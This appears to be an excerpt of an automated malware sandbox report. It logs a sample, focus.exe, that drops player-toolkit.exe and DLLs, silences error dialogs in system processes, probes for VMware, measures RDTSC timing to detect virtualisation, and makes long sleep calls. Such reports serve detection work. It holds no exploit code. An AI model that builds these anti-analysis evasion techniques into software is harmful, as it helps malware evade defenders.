Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	RDTSC instruction interceptor: First address: 00000000000198E4 second address: 00000000000198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	RDTSC instruction interceptor: First address: 0000000000019B4E second address: 0000000000019B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000003D98E4 second address: 00000000003D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wscript.exe	RDTSC instruction interceptor: First address: 00000000003D9B4E second address: 00000000003D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\focus.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe

Code function: 2_2_00019A80 rdtsc

2_2_00019A80

Source: C:\Users\user\Desktop\focus.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\bass.dll			Jump to dropped file
Source: C:\Users\user\Desktop\focus.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\OptimFROG.dll			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59673s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59345s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59236s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -59017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58798s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58689s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58470s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58142s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -58032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57923s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57814s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57595s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57376s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -57048s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56939s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56720s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56501s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56392s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56173s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -56064s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55845s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55736s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55626s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55517s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55408s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55298s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55189s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -55079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54970s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54751s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54642s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54423s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -54095s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53767s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53657s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53548s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53439s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53220s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -53001s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52892s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52673s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52345s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -52016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51798s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51689s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51470s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51142s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -51037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50814s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50595s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50376s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50267s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -50037s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49923s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49595s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49376s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49267s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -49048s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48939s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48829s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48720s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48501s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48173s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -48063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47845s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47626s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47511s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47356s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -47032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -46922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -46813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -46367s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -46251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -46140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -46033s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -45899s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -45798s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -44630s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -44517s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -44407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -44298s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -44189s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -44079s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43970s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43861s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43533s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43423s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43314s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -43094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42876s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42767s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42658s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42548s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42439s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42220s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42111s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -42001s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41892s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41673s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41564s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41454s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41345s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41236s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -41017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40798s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40689s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40470s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40361s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40142s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -40033s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39923s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39814s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39705s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5880	Thread sleep time: -39595s >= -30000s	Jump to behavior
